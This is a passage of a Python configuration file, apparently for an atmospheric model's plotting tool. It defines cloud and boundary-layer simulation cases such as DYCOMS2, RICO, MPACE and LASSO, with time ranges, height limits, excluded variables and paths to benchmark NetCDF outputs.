'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]}
DYCOMS2_RF02_DS_RESTART = {'name': 'dycoms2_rf02_ds_restart',
'description': "Copied from plotgen: ** Uniform, coarse verticle grid spacing of 40 m. **",
'start_time': 181, 'end_time': 240,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_restart_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_ds_restart_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_ds_restart_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP,
VariableGroupCorrelations, VariableGroupKKMP]}
DYCOMS2_RF02_SO = {'name': 'dycoms2_rf02_so',
'description': "Copied from plotgen: " +
"** WRF-type stretched (unevenly spaced) grid (grid_type = 3) ** ",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_nodr_sed/DYCOMS_RF02_128x128x96_nodr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_so_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_so_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_so_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]}
FIRE = {'name': 'fire',
'description': "",
'start_time': 61, 'end_time': 120,
'height_min_value': 0, 'height_max_value': 1000,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/fire_zm.nc',
'zt': clubb_output_root + '/fire_zt.nc',
'sfc': clubb_output_root + '/fire_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + "/fire_zm.nc",
'zt': HOC_OUTPUT_ROOT + '/fire_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/fire_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': {'zm': wrf_output_root + "/fire_zm_wrf.nc",
'zt': wrf_output_root + "/fire_zt_wrf.nc",
'sfc': wrf_output_root + "/fire_sfc_wrf.nc"
},
'var_groups': [VariableGroupBase, VariableGroupWs]}
# No budgets
GABLS2 = {'name': 'gabls2',
'description': "",
'start_time': 2101, 'end_time': 2160,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': ['tau_zm', 'radht', 'Skw_zt', 'Skrt_zt', 'Skthl_zt', 'corr_w_chi_1', 'corr_chi_eta_1',
'rcp2', 'thlpthvp', 'rtpthvp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc',
'zt': clubb_output_root + '/gabls2_zt.nc',
'sfc': clubb_output_root + '/gabls2_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sw.nc",
'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sfc.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GABLS2_NIGHTLY = {'name': 'gabls2_nightly',
'description': "",
'start_time': 2101, 'end_time': 2160,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc',
'zt': clubb_output_root + '/gabls2_zt.nc',
'sfc': clubb_output_root + '/gabls2_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupScalars]}
GABLS3 = {'name': 'gabls3',
'description': "",
'start_time': 1081, 'end_time': 1200,
'height_min_value': 0, 'height_max_value': 4970,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls3_zm.nc',
'zt': clubb_output_root + '/gabls3_zt.nc',
'sfc': clubb_output_root + '/gabls3_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GABLS3_NIGHT = {'name': 'gabls3_night',
'description': "Copied from plotgen: Uses a 5-min timestep with 48 levels",
'start_time': 421, 'end_time': 480,
'height_min_value': 0, 'height_max_value': 800,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/GABLS3_NIGHT/gabls3_night.nc"},
'clubb_file': {'zm': clubb_output_root + '/gabls3_night_zm.nc',
'zt': clubb_output_root + '/gabls3_night_zt.nc',
'sfc': clubb_output_root + '/gabls3_night_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GATE_SHEAR_RLSF = {'name': 'gate_shear_rlsf',
'description': "",
'start_time': 540, 'end_time': 720,
'height_min_value': 0, 'height_max_value': 24000,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/GATE_shear_rlsf/GATE_shear_rlsf_64x64x128_1km_5s.nc"},
'clubb_file': None,
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/GATE_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase]}
# Use to plot IOP forced SAM runs
IOP = {'name': 'iop',
'description': "",
'start_time': 181, 'end_time': 1440,
'height_min_value': 0, 'height_max_value': 27750,
'blacklisted_vars': [],
'clubb_datasets': None,
'sam_benchmark_file': None,
'clubb_file': None,
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'var_groups': [VariableGroupBase, VariableGroupSamProfiles]}
JUN25_ALTOCU = {'name': 'jun25_altocu',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 4825, 'height_max_value': 7290,
'blacklisted_vars': ['Ngm', 'wprrp', 'wpNrp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/jun25_altocu_zm.nc',
'zt': clubb_output_root + '/jun25_altocu_zt.nc',
'sfc': clubb_output_root + '/jun25_altocu_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
LBA = {'name': 'lba',
'description': "Note that sam-plotgen plots up to a height of 16000 not 12000.\n"
"Copied from plotgen: SAM-LES uses Morrison microphysics " +
"and CLUBB standalone uses COAMPS microphysics",
'start_time': 300, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 14000,
'blacklisted_vars': ['wprrp', 'wpNrp', 'Ngm'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/LBA_128kmx128kmx128_1km_Morrison/LBA_128kmx128kmx128_1km_Morrison.nc"},
'clubb_file': {'zm': clubb_output_root + '/lba_zm.nc',
'zt': clubb_output_root + '/lba_zt.nc',
'sfc': clubb_output_root + '/lba_sfc.nc',
'subcolumns': clubb_output_root + '/lba_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/LBA_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP, VariableGroupWs]}
MC3E = {'name': 'mc3e',
'description': "",
'start_time': 60, 'end_time': 64800,
'height_min_value': 0, 'height_max_value': 18000,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/MC3E_r1359_128x128x128_1km_Morrison/MC3E.nc"},
'clubb_file': {'zm': clubb_output_root + '/mc3e_zm.nc',
'zt': clubb_output_root + '/mc3e_zt.nc',
'sfc': clubb_output_root + '/mc3e_sfc.nc',
'subcolumns': clubb_output_root + '/mc3e_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
MPACE_A = {'name': 'mpace_a',
'description': "Copied from plotgen: SAM-LES and CLUBB standalone use Morrison microphysics",
'start_time': 4141, 'end_time': 4320,
'height_min_value': 0, 'height_max_value': 10000,
'blacklisted_vars': ['Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'Ngm', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/MPACE_A/MPACE_A_128x128x69_morr_CEM.nc"},
'clubb_file': {'zm': clubb_output_root + '/mpace_a_zm.nc',
'zt': clubb_output_root + '/mpace_a_zt.nc',
'sfc': clubb_output_root + '/mpace_a_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
MPACE_B = {'name': 'mpace_b',
'description': "Copied from plotgen: **The nightly simulation uses COAMPS microphysics**",
'start_time': 541, 'end_time': 720,
'height_min_value': 0, 'height_max_value': 2750,
'blacklisted_vars': ['Ngm', 'wpNrp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/mpace_b_zm.nc',
'zt': clubb_output_root + '/mpace_b_zt.nc',
'sfc': clubb_output_root + '/mpace_b_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sw.nc",
'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sfc.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
MPACE_B_SILHS = {'name': 'mpace_b_silhs',
'description': "",
'start_time': 541, 'end_time': 720,
'height_min_value': 0, 'height_max_value': 2750,
'blacklisted_vars': ['Ngm', 'wpNrp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/mpace_b_silhs_zm.nc',
'zt': clubb_output_root + '/mpace_b_silhs_zt.nc',
'sfc': clubb_output_root + '/mpace_b_silhs_sfc.nc',
'subcolumns': clubb_output_root + '/mpace_b_silhs_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
NOV11_ALTOCU = {'name': 'nov11_altocu',
'description': "",
'start_time': 91, 'end_time': 150,
'height_min_value': 4160, 'height_max_value': 6150,
'blacklisted_vars': ['Ngm'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/nov11_altocu_zm.nc',
'zt': clubb_output_root + '/nov11_altocu_zt.nc',
'sfc': clubb_output_root + '/nov11_altocu_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/nov11_altocu_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/nov11_altocu_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/nov11_altocu_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/nov11_altocu_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/nov11_altocu_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
RICO = {'name': 'rico',
'description': "Cam output may differ from plotgen due to a difference in time averaging.",
'start_time': 4201, 'end_time': 4320,
'height_min_value': 0, 'height_max_value': 5000,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/RICO_256x256x100_drizzle/RICO_256x256x100_drizzle.nc"},
'clubb_file': {'zm': clubb_output_root + '/rico_zm.nc',
'zt': clubb_output_root + '/rico_zt.nc',
'sfc': clubb_output_root + '/rico_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': {'e3sm': e3sm_output_root + "/rico.nc"},
'cam_file': {'cam': cam_output_root + "/rico_cam.nc"},
'sam_file': {'sam': sam_output_root + "/RICO_256x256x100_drizzle.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupWs, VariableGroupCorrelations,
VariableGroupKKMP]}
RICO_SILHS = {'name': 'rico_silhs',
'description': "Copied from plotgen: CLUBB and SAM use Khairoutdinov-Kogan microphysics",
'start_time': 4201, 'end_time': 4320,
'height_min_value': 0, 'height_max_value': 4500,
'blacklisted_vars': ['wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/RICO_256x256x100_drizzle/RICO_256x256x100_drizzle.nc"},
'clubb_file': {'zm': clubb_output_root + '/rico_silhs_zm.nc',
'zt': clubb_output_root + '/rico_silhs_zt.nc',
'sfc': clubb_output_root + '/rico_silhs_sfc.nc',
'subcolumns': clubb_output_root + '/rico_silhs_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupWs, VariableGroupCorrelations,
VariableGroupKKMP]}
NEUTRAL = {'name': 'neutral',
'description': "",
'start_time': 181, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1500,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/NEUTRAL/NEUTRAL_96x96x96_32m_10m_LES.nc"},
'clubb_file': {'zm': clubb_output_root + '/neutral_zm.nc',
'zt': clubb_output_root + '/neutral_zt.nc',
'sfc': clubb_output_root + '/neutral_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs]}
TWP_ICE = {'name': 'twp_ice',
'description': "Copied from plotgen: Both vertical and horizontal fluxes applied to THLM and RTM for LES. "
"LES nudged U, V, RTM and THLM toward observed values. Forcings for LES derived from 10mb "
"forcing data.",
'start_time': 60, 'end_time': 9900,
'height_min_value': 0, 'height_max_value': 19000,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/TWP_ICE_r1315_128x128x128_1km_Morrison/TWP_ICE.nc"},
'clubb_file': {'zm': clubb_output_root + '/twp_ice_zm.nc',
'zt': clubb_output_root + '/twp_ice_zt.nc',
'sfc': clubb_output_root + '/twp_ice_sfc.nc',
'subcolumns': clubb_output_root + '/twp_ice_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]}
WANGARA = {'name': 'wangara',
'description': "Note that COAMPS benchmark data is actually RAMS data by default.",
'start_time': 181, 'end_time': 240,
'height_min_value': 0, 'height_max_value': 1900,
'blacklisted_vars': ['Ngm'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/WANGARA/WANGARA_64x64x80_100m_40m_LES.nc"},
'clubb_file': {'zm': clubb_output_root + '/wangara_zm.nc',
'zt': clubb_output_root + '/wangara_zt.nc',
'sfc': clubb_output_root + '/wangara_sfc.nc'},
'coamps_benchmark_file': {'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/wangara_rams.nc",
'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/wangara_rams.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/wangara_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/wangara_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/wangara_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': {'zm': wrf_output_root + "/wangara_zm_wrf.nc",
'zt': wrf_output_root + "/wangara_zt_wrf.nc",
'sfc': wrf_output_root + "/wangara_sfc_wrf.nc"
},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20170627 = {'name': 'lasso_20170627',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-06-27/wrf_lasso_stats_2017-06-27.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2017-06-27_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2017-06-27_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2017-06-27_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2017-06-27_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20170717 = {'name': 'lasso_20170717',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-07-17/wrf_lasso_stats_2017-07-17.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2017-07-17_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2017-07-17_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2017-07-17_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2017-07-17_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20170728 = {'name': 'lasso_20170728',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-07-28/wrf_lasso_stats_2017-07-28.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2017-07-28_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2017-07-28_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2017-07-28_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2017-07-28_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20170923 = {'name': 'lasso_20170923',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-09-23/wrf_lasso_stats_2017-09-23.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2017-09-23_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2017-09-23_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2017-09-23_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2017-09-23_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20180911 = {'name': 'lasso_20180911',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-11/wrf_lasso_stats_2018-09-11.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-11_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2018-09-11_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2018-09-11_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2018-09-11_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20180917 = {'name': 'lasso_20180917',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-17/wrf_lasso_stats_2018-09-17.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-17_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2018-09-17_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2018-09-17_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2018-09-17_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20180918 = {'name': 'lasso_20180918',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
